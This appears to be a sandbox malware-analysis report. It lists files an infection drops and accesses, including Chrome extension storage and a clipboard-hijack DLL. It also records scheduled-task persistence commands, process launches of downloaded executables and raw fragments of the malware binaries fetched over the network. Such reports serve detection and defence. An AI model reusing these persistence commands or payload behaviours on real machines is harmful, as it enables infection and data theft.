file C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\Sync Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\SwReporter\Sync Extension Settings\cjmkndjhnagcfbpiemnkdpomccnjblmj\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Sync Extension Settings\jnkelfanjkeadonecabehalmbgpfodjm\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Subresource Filter\Sync Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\WidevineCdm\Sync Extension Settings\flpiciilemghbmfalicajoolhkkenfel\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\SwReporter\Local Extension Settings\aijcbedoijmgnlmjeegjaglmepbmpkpi\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.ldb
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Sync Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\Sync Extension Settings\fhilaheimglignddkjgofkcbgekhenbh\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Local Extension Settings\gojhcdgcpbpfigcaejpfhfegekdgiblk\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\Sync Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\Sync Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kkpllkodjeloidieedojogacfhpaihoh\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics.pma
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\Sync Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\Sync Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Subresource Filter\Sync Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Sync Extension Settings\kkpllkodjeloidieedojogacfhpaihoh\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\WidevineCdm\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\kmhcihpebfmpgmihbkipmjlmmioameka\CURRENT
domain ipinfo.io
file C:\Users\test22\AppData\Local\Temp\Protect544cd51a.dll
file C:\Users\test22\AppData\Local\Temp\1000574001\stan.exe
file C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9\XB6HWAvSS60oS8YtMo1a.exe
file C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9\6IaVlI6Bnvzzy7JvUjLd.exe
file C:\Users\test22\AppData\Local\Temp\1000592001\crypted.exe
file C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9\xHLWqppYh13Be9jJk15F.exe
file C:\Users\test22\AppData\Roaming\006700e5a2ab05\cred64.dll
file C:\Users\test22\AppData\Local\Temp\BroomSetup.exe
file C:\Users\test22\AppData\Local\Temp\toolspub1.exe
file C:\Users\test22\AppData\Local\Temp\1000601001\Awwnbpxqsf.exe
file C:\Users\test22\AppData\Local\Temp\nspACB2.tmp\INetC.dll
file C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9\vhaNZRtsx6oDxE2wLedH.exe
file C:\Users\test22\AppData\Local\Temp\1000595001\rdx1122.exe
file C:\Users\test22\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
file C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll
file C:\Users\test22\AppData\Local\Temp\1000603001\2024.exe
file C:\Users\test22\AppData\Local\Temp\rty25.exe
file C:\Users\test22\AppData\Local\Temp\1000597001\alex.exe
file C:\Users\test22\AppData\Local\Temp\1000583001\store.exe
file C:\Users\test22\AppData\Local\Temp\1000589001\kskskfsf.exe
file C:\Users\test22\AppData\Roaming\Temp\Task.bat
file C:\Users\test22\AppData\Local\Temp\1000590001\latestrocki.exe
file C:\Users\test22\AppData\Local\Temp\InstallSetup7.exe
file C:\Users\test22\AppData\Local\Temp\1000586001\TrueCrypt_NKwtUN.exe
file C:\Users\test22\AppData\Local\Temp\1000591001\gold1234.exe
file C:\Users\test22\AppData\Local\Temp\FirstZ.exe
file C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9\y0cb10l651CUsg6eGw3C.exe
file C:\Users\test22\AppData\Local\Temp\1000600001\leg221.exe
file C:\Users\test22\AppData\Local\Temp\1000582001\moto.exe
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN explorhe.exe /TR "C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe" /F
cmdline schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\test22\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
cmdline schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explorhe.exe /TR "C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe" /F
cmdline schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
file C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9\xHLWqppYh13Be9jJk15F.exe
file C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9\6IaVlI6Bnvzzy7JvUjLd.exe
file C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9\XB6HWAvSS60oS8YtMo1a.exe
file C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9\y0cb10l651CUsg6eGw3C.exe
file C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe
file C:\Users\test22\AppData\Local\Temp\1000574001\stan.exe
file C:\Users\test22\AppData\Local\Temp\1000582001\moto.exe
file C:\Users\test22\AppData\Local\Temp\1000583001\store.exe
file C:\Users\test22\AppData\Local\Temp\1000586001\TrueCrypt_NKwtUN.exe
file C:\Users\test22\AppData\Local\Temp\1000589001\kskskfsf.exe
file C:\Users\test22\AppData\Local\Temp\1000590001\latestrocki.exe
file C:\Users\test22\AppData\Local\Temp\1000591001\gold1234.exe
file C:\Users\test22\AppData\Local\Temp\1000592001\crypted.exe
file C:\Users\test22\AppData\Local\Temp\1000595001\rdx1122.exe
file C:\Users\test22\AppData\Local\Temp\1000597001\alex.exe
file C:\Users\test22\AppData\Local\Temp\1000600001\leg221.exe
file C:\Users\test22\AppData\Local\Temp\1000601001\Awwnbpxqsf.exe
file C:\Users\test22\AppData\Local\Temp\1000603001\2024.exe
file C:\Users\test22\AppData\Local\Temp\InstallSetup7.exe
file C:\Users\test22\AppData\Local\Temp\toolspub1.exe
file C:\Users\test22\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
file C:\Users\test22\AppData\Local\Temp\rty25.exe
file C:\Users\test22\AppData\Local\Temp\FirstZ.exe
file C:\Users\test22\AppData\Local\Temp\1000597001\alex.exe
file C:\Users\test22\AppData\Local\Temp\1000590001\latestrocki.exe
file C:\Users\test22\AppData\Local\Temp\nspACB2.tmp\INetC.dll
file C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9\xHLWqppYh13Be9jJk15F.exe
file C:\Users\test22\AppData\Local\Temp\toolspub1.exe
file C:\Users\test22\AppData\Local\Temp\InstallSetup7.exe
file C:\Users\test22\AppData\Local\Temp\1000583001\store.exe
file C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9\XB6HWAvSS60oS8YtMo1a.exe
file C:\Users\test22\AppData\Local\Temp\1000603001\2024.exe
file C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll
file C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe
file C:\Users\test22\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
file C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9\y0cb10l651CUsg6eGw3C.exe
file C:\Users\test22\AppData\Local\Temp\Protect544cd51a.dll
file C:\Users\test22\AppData\Local\Temp\1000595001\rdx1122.exe
file C:\Users\test22\AppData\Local\Temp\1000600001\leg221.exe
file C:\Users\test22\AppData\Local\Temp\1000592001\crypted.exe
file C:\Users\test22\AppData\Local\Temp\1000589001\kskskfsf.exe
file C:\Users\test22\AppData\Local\Temp\BroomSetup.exe
file C:\Users\test22\AppData\Local\Temp\1000574001\stan.exe
file C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9\6IaVlI6Bnvzzy7JvUjLd.exe
file C:\Users\test22\AppData\Local\Temp\1000601001\Awwnbpxqsf.exe
file C:\Users\test22\AppData\Local\Temp\1000591001\gold1234.exe
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 2676
thread_handle: 0x00000138
process_identifier: 2672
current_directory:
filepath:
track: 1
command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x0000013c
1 1 0

CreateProcessInternalW

thread_identifier: 2760
thread_handle: 0x00000144
process_identifier: 2756
current_directory:
filepath:
track: 1
command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x00000140
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: SCHTASKS
parameters: /Create /SC MINUTE /MO 1 /TN explorhe.exe /TR "C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe" /F
filepath: SCHTASKS
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000574001\stan.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000574001\stan.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: rundll32.exe
parameters: C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
filepath: rundll32.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000582001\moto.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000582001\moto.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000583001\store.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000583001\store.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000586001\TrueCrypt_NKwtUN.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000586001\TrueCrypt_NKwtUN.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000589001\kskskfsf.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000589001\kskskfsf.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000590001\latestrocki.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000590001\latestrocki.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000591001\gold1234.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000591001\gold1234.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000592001\crypted.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000592001\crypted.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000595001\rdx1122.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000595001\rdx1122.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000597001\alex.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000597001\alex.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000600001\leg221.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000600001\leg221.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000601001\Awwnbpxqsf.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000601001\Awwnbpxqsf.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000603001\2024.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000603001\2024.exe
1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 604
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 16 (PAGE_EXECUTE)
base_address: 0x070e0000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Time & API Arguments Status Return Repeated

InternetReadFile

buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $šÇƒ®Þ¦íýÞ¦íýÞ¦íýj:ýý¦íýj:ýC¦íýj:ýý¦íý@*ýߦíýŒÎèüó¦íýŒÎéü̦íýŒÎîü˦íý×Þnýצíý×Þ~ýû¦íýÞ¦ìý÷¤íý{ÏãüŽ¦íý{Ïîüߦíý{ÏýߦíýÞ¦zýߦíý{ÏïüߦíýRichÞ¦íýPEL²eà" ¬ RwÀ @`ÜH@€@@dŽ |@ L–à ”uð 4  @À ”.text« ¬  `.rdata‚ûÀ ü° @@.datalpÀ H¬ @À.rsrcL–@ ˜ô @@.reloc”uà vŒ @B¹t Mè8ýhé#DèðYÃhó#DèƒðYÃèæÞhø#DèrðYÃèY<hý#DèaðYÃQè©h$DèOðYá0MQ‹@0MPèã#h$Dè/ðYÃèÞ%h$DèðYÃè®çh!$Dè ðYÃèA2h&$DèüïYÃèPÁh0$DèëïYù%M蝘h?$DèÕïYÃV‹ñN贇N謇j(VèâìYY‹Æ^ÂU‹ìƒì8Ç0MtÉI3ÒÇœM0ÉI‰ M‰¤MVQf‰¨Mèo¡0M‹@ǀ0M\ÉI¡0M‹H”ûÿÿ‰,M3À¹¸M£ÌM£ÐM£ÔMèY ¹èMè헹øMè㗹Mèٗ3À¹„M£TM£XM£\M£`M£dM£hM£lM£pM£tM£xM蛗3ÀǬM<ÉI¹M£”M£˜Mf£œM£ M£¤Mf£¨M£°M£´M£¸M£¼M£ÀM£ÄMÇÈM@ÉI£ÌM£ÐM£ÔMÇØM@ÉI£ÜM£àM£äMÇèM@ÉI£ìM£ðM£ôMÇøMDÉI£üM£M£M£M£MÇMèϖ¹(Mè€ÇM<ÉI3Ò¹M‰M‰M‰ M膹@M蓖3À¹„MP£`M£dM£hM£pM£tM£xMèGMÈè$P¡0M‹HÁ4M薍Mè胼MÈè{¼3ÀfÇ0Mjö£,M£ M£$M£M£M£(M£€Mf£lM¢”M¢}M£\MÿhÂI‹ð…ö… 3҉|MèÂRÿhÈI¸0M^É¡0M¹@MV‹@ǀ0MhÉI3À£4M£8M£<Mè+¹tMè!¾¨M‹Î腕h ÉI‹ÎèoW¸0M^ÂV‹ñNèe•Nè
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $wDþØ3%‹3%‹3%‹hM“Š=%‹hM•Š­%‹hM”Š %‹æH”Š!%‹æH“Š'%‹æH•ŠF%‹hM‘Š"%‹3%‘‹ã%‹¨K™Š2%‹¨Ko‹2%‹¨K’Š2%‹Rich3%‹PELl֖eà  °Ä_@ @€@@8Ð6`ðØ(Ð6`´8Ð6<@à  j@@àP@ ª@à´@àP ´@à.rsrcð´@àÐ/¶@à.data° Ð6¨ ¶@àÌ%õŽ½ ¸ä {÷v:]rƒ#Ý ¢í÷:þIì]À™_²½­õ taúû¹ÝêBû},#nÂÿd–ª`t|áIÂÖ8 ÑÔ¨^Yo@Çxº3>+7!°ß՜r=!˜¸ytEÈ«½ñÞUTl¸ÊF3<’ŒÍ«zû.Ÿµý9øñ3Qÿ "±!¸ï½‰5$ˆj²dýæœôÆ.Ðbd”0XÅ9ò%™»0 Ý>' õï*+ÐKûvâ.âŸÂs#_ÓF+ß.˜ õw¡³ücRýóºJ3IK…Û<|/¿Jñãwz„%®(bÌ¹%’5lZø^sê`£…ìGÜg_݌;,Âk™´¡4ѱ¡gÇ»¼©lf$¨TFʋ|¿‚£—-¶ÚzP›%¦‰Dí)µ8PYÙŽ¤•p%ƒŠOLä”*ZÃÏ6Xydˆ¯·€å¤Ó_ÂS(«Uª^×]Žœ­èßY%ª×RôF¸¸9A±Ÿ‹Øê՜« g=ˆ’ ¾r™¼ÃÎ%Þðp) ¢é5Óÿ??Ù1ÊB<c1Ÿo5àÉÆa¸é•1,õÇyPûVþQ|›<N´öfª€¶¿dûÙ¯_eʆ¢²øÄÉ9Þ ûfw˜ŸÇXlè*¬È&„|1yˆM^õ#;óböY·ëé|õEe±ÚQQÐ0þ‹OèûyUhF[:·ÓÆ<J›Ý=±]ŜŠ=±AZ|û.K§ÆÕî]3wóQ™«÷—1 ê)?ë%¹K.( çب3‰þd•ÃÂv†¼Sgs çrìë,)<ô›%6û®:걧oa#@¹§ NoJq™§Ø;vʇF#B¼í…à‹J䈡xúýegòÑóš4b ŒÅ3-„ŒæØ^‚â-AÆÙÌ`ÒS<Æşi.Bý6ûÔg$[È2V$Åšr~ §ðÁ?o4 …·»4›Šì1]ñG4„¯Æ贋˭¯ÅYyIÕÑã…0EÚIÆt=”#ۓŒÞìù«c«y—wA…½‡’>'Q„É­7˜]‘dö5źxq]Λ"^ðx/"jnK«ˆ_–\rÒÁ»fÖVñ³p°^Í4nðeŽýù©È°å£ï×ÁRÚ¨ï×½óð²q3w‘CÁwÚU÷·{ãlúÍ «çV©\y¯ÏZ8¶“­ÃFBãl4ÇT‘ Fñ¦¶ãwf’–zmh_¬Ò…Æ“þû£×ËH]PÊÙüˆá¦xÚåfÃçQAµ#^’®`ŒfÅاBB^lì’иf0êË,ÁÀUnUb“Mj”E^ÕzÔªAl–˜
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL‰¡$eà. 0êî  @ ``…  K ˜@ X   H.textôé ê `.rsrc˜ ì@@.reloc @ò@BÐ H¸‰XYã`$0]+(-  0~:K€( è  s ( þþ ( ( ? rps z*6+(ÔïV\(*N+(\L(’( *j+(΂-/(’( }*0@s @ (&*0c ?(  ~ ( :E Óå Ó6!a~p{®a(3 ( %( & Ð( (&(&*0( ~  8iš o þB™Þ b Éõvúa~p{ea(3( 90 o (:*(&( o (&X Ži?Žÿÿÿ(&*0‚( ~  8^š o "þ÷6 b"/*a~p{Ua(3( 9+ o (:*(& o (&X Ži?™ÿÿÿ(&*0 e ?(  ~ ( :G.( þ %( &%~ ( & Ð( (&(&*0_~ o :~ o! o" 8o# ; o" Ý 9o$ ÜÝ&Ý* 9F XX0ä(((( ÆìF% ôLéa~p{Ža(3( d©ˆ‹ VÿéX Êo€na~p{Za(3 vòBb wŸBX &÷Þa~p{³a(3 PÊf Ù~¶žX s(«¬a~p{«a(3( ç4Z€ 󚃶a~p{ta(3 Ñ ¨ >>­ a~p{fa(3 ¨Pe› Áb€a~p{Za(3( žD£ ÒmU’a~p{€a(3 Z])Ï äu8Éa~p{“a(3 z{SÀf mÄaa~p{Pa(3( ×(œ i˜Ða~p{ªa(3 ¸’ ü*•a~p{Za(3 p·¡ f ¶è²Ëa~p{sa(3( ë‘j7 ?Îð:X X–Ça~p{aa(3 ‚€¾Õ N‰–™a~p{•a(3 ´µßŸ WhZQa û¨éòa~p{†a(3( È\g hçþY ƒ…-a~p{aa(3 m#˽ ·*èÏa~p{¶a(3 ÿ
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $CÔë캸캸캸L”¹¹ 캸L”¿¹Æ캸L”½¹캸HG¸캸H¾¹캸H¹¹캸H¿¹R캸L”¾¹캸L”¼¹캸L”»¹캸컸íº¸Ì³¹캸̐E¸캸ì-¸캸̐¸¹캸Rich캸PEL·¹°eà "šjN°@0N@€PDœ@ø=PD h[8 *@àp°.@à@ L@àP`T@à°V@à.rsrc@@>V@àÐ/€”@à.dataà PDØ ”@à¬Æ*ièP©8^Gj] ½°´ÝЈLê°&2‘a֙Zy|aëÕv(¦wrÊçΖìC‘ÓxhpLržd “ñ ¤_Ç ½2“±^¸“w¬7Süä¡HñÞz8¢ú1д¥Ãê”»ê$r®}uºÓÉzpyˆ=î¦.õ,‡b’}Ò¦½ ÊWqOݟ‹¤Q%cߣóü¡ÊŒ±úڅ˜Ú_©Þœ¬Ùí)Çyᙶiá8+D‡lÁšK} ’\€fŠø+äZ:{‡(ì’E”ÁzUvÝ^°ÁYÒ»ZƒË‚U?ÆžÐi¦L|mAV\X=,V ñDß°ú¦r ‰†€<û0±xϾ’¡OŸŽ_Û<W?„;!Àäœçgï"yI¬¿£Cã·üõsM:'õ®T nž.‘Ò~ä$  îS6qclúhëØÿˆö0¯ HòŽhœLÝ\¨ç ¸´¨ô2ɉˆÅ¶ º¾I@gZc]fTùvV¤×Yó`lUfÖ" ‘¢×Qý*þžGR[Çb@o>\ٙ@O‘=Ç¢-JN~Ý&¶Ì:ý±9Ë%Iég&À¦»?ðŒ¸ÐLjx¾ÁƱ‚I &¨±„F‰RØÿþFOÚu…<m UX»+Ÿ j,kš¯ß$A£ ‚½?Þs%G¢]hÞ|S¡y¸Œû¡e‚n/$3»¢õ²×òˆ’+`D]­p$X$ÒOª”„ešø¬…НðéYöµÍ#‚‚$$æ9 –Á$ڀ<à«os»µÓR¹ÔmaxË]úG–ï°€ý7ìTÆû‹b4DHkÿÂÃY;—Þ—ùXóçNY ÂA«ÿ:­·ók2Òâ90šþ­Ãóþ #}ò4œn£?H̱F:˜Ël½í%ì²ï¶prš„å°aZÝËärýs1àÓ2|_â#Jéa8¨³Ø·È zÕfj]ÁútPûVæÚqà`Þ§Õ×¼mq˜Í× æ-BVÀâµ| }ÿƀ©!58Ƥád{ø¬ ø濹§Ö¨Ð4/ï¦tù$¼4ðóûÛv°"Í9¿¡GQõ~}¯íƒv˜øß ¢›tÂÞHØäJDfB¤î„·duûbD”@Þ ÊJä€ÑêÑÁÐD=×næUÓÀÓ£:d¶_ñm£ê¬L äЮ(º¬G¨(}Ã@œ‚7êü&7ƒYÒzÀ¡Ëç­i¾>ê?ùLÝ%!šUÇDà«PõÅSB¶¦q€¤ǽÖuÝiý'¹À¾L',ÅÉÆ §¨›;žYfÖ,åðàÏ­úè}I©SÝrÊEM÷¼‡Òlv
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $šÇƒ®Þ¦íýÞ¦íýÞ¦íýj:ýý¦íýj:ýC¦íýj:ýý¦íý@*ýߦíýŒÎèüó¦íýŒÎéü̦íýŒÎîü˦íý×Þnýצíý×Þ~ýû¦íýÞ¦ìý÷¤íý{ÏãüŽ¦íý{Ïîüߦíý{ÏýߦíýÞ¦zýߦíý{ÏïüߦíýRichÞ¦íýPEL²eà" ¬ JwÀ @Pc‘@€@@dŽ |@ àÐ ”uð 4  @À ”.text« ¬  `.rdata‚ûÀ ü° @@.datalpÀ H¬ @À.rsrcà@ ô @@.reloc”uÐ v„ @B¹t Mè8ýhé#DèðYÃhó#DèƒðYÃèæÞhø#DèrðYÃèY<hý#DèaðYÃQè©h$DèOðYá0MQ‹@0MPèã#h$Dè/ðYÃèÞ%h$DèðYÃè®çh!$Dè ðYÃèA2h&$DèüïYÃèPÁh0$DèëïYù%M蝘h?$DèÕïYÃV‹ñN贇N謇j(VèâìYY‹Æ^ÂU‹ìƒì8Ç0MtÉI3ÒÇœM0ÉI‰ M‰¤MVQf‰¨Mèo¡0M‹@ǀ0M\ÉI¡0M‹H”ûÿÿ‰,M3À¹¸M£ÌM£ÐM£ÔMèY ¹èMè헹øMè㗹Mèٗ3À¹„M£TM£XM£\M£`M£dM£hM£lM£pM£tM£xM蛗3ÀǬM<ÉI¹M£”M£˜Mf£œM£ M£¤Mf£¨M£°M£´M£¸M£¼M£ÀM£ÄMÇÈM@ÉI£ÌM£ÐM£ÔMÇØM@ÉI£ÜM£àM£äMÇèM@ÉI£ìM£ðM£ôMÇøMDÉI£üM£M£M£M£MÇMèϖ¹(Mè€ÇM<ÉI3Ò¹M‰M‰M‰ M膹@M蓖3À¹„MP£`M£dM£hM£pM£tM£xMèGMÈè$P¡0M‹HÁ4M薍Mè胼MÈè{¼3ÀfÇ0Mjö£,M£ M£$M£M£M£(M£€Mf£lM¢”M¢}M£\MÿhÂI‹ð…ö… 3҉|MèÂRÿhÈI¸0M^É¡0M¹@MV‹@ǀ0MhÉI3À£4M£8M£<Mè+¹tMè!¾¨M‹Î腕h ÉI‹ÎèoW¸0M^ÂV‹ñNèe•Nè
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $CÔë캸캸캸L”¹¹ 캸L”¿¹Æ캸L”½¹캸HG¸캸H¾¹캸H¹¹캸H¿¹R캸L”¾¹캸L”¼¹캸L”»¹캸컸íº¸Ì³¹캸̐E¸캸ì-¸캸̐¸¹캸Rich캸PEL·¹°eà "šjÄN°@0N@€PDœ@ø=PD h[8 *@àp°.@à@ L@àP`T@à°V@à.rsrc@@>V@àÐ/€”@à.dataà PDÚ ”@ଋû”£]­f?”¦9Ùíg‡šU7ߛùGظ2³Ux?È1Š•¡ü(««³ÝÏ$ oK=VÄÒ?ñYàCZ«T •=— Ê1HH¼I x¥ %¬VŠl–8óՔ$… )w—§˜vŽÄ~ùÝÄ·D•Î$—4«½¡B¡€zº óøÞ:£árNJõÔ$¢µwHõݜÄV&¸Ý¨ Í}ˆ)$tÙ×V¹ÚEÓ%mCy<X¯‘µƒ¸Þ¦üÐ÷¦ïx%ÀCö:S”xÌDœÕ¨õåˆ}hmœDG·þ5𣤖$ä2«V6š¡#M­¶Ù†ëO½µÊ-lü kè½Ú©\²qÖÈC±Un¹·ìù±,Җ*^Ê*Üb˦ ‡#þóë6 ã_‹îÂ5¹aÎÐb7«–³•ë£ª'#+–Õ6;Š¶µS¶¤w}Fkã7Ú><ô¿=)tƒ‰çûñÑ ±`%Ζ„2‡äõ-X¾_n–`*Tãùâm(;{©±û—?a>m]‰Ï9pùƒ¹BèQñª€šZ»ÝHžž ºûo®WDéׁÂHòß]ÔNæGʁ±òJÕVϖ°¥šë) û~ãÏÃ?øª36”®½Ç¡âö EÚ æÎI/¯¢ ·>èÕ —Q.z3EAV¾E¯•"ËgqZ!øÃÛ»öt%<IeÓ¸}9æ uíãAöÂç}§Bq¢þ”XÝ1ᇯÀ¦–ÑP/Ç÷ *¯Ži ,m;„éé«ñÿfm68@‡ÎæªËv’XøÿrÑ¢Ûڛ•2µ¶Þ^‰4Ó5~ Ì *žyÉßâǂÞ)* ÐYýü·T@1Í3ÆÝl‘;ó°Y\ac$Íihõš“ í}õÎSÒ,«¢¬0•2ó,™&›…ü9&È«Â Z™M½Î‘ÆÕjºˆ&lï¯Þ_ùwljX44’×i7ˆ‚RYäa1¹ 